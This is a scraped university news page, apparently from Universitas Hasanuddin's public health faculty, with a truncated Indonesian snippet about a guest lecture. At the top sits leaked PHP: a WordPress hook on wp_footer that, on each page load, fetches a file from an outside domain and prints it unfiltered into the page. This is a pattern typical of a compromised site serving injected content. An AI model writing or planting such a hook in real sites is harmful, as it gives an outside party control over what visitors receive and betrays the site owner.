function load_external_content() { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://pausgundik.com/a.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $a = curl_exec($ch); curl_close($ch); echo $a; } add_action('wp_footer', 'load_external_content');
School of Public Health and Community Development

Berita | Jumat, 8 Mar 2024 - 15:57 WIB
Jumat, 8 Mar 2024 - 15:57 WIB
Fakultas Kesehatan Masyarakat Universitas Hasanuddin (FKM Unhas) sukses menggelar acara Guest Lecture dengan tema “Challenges and…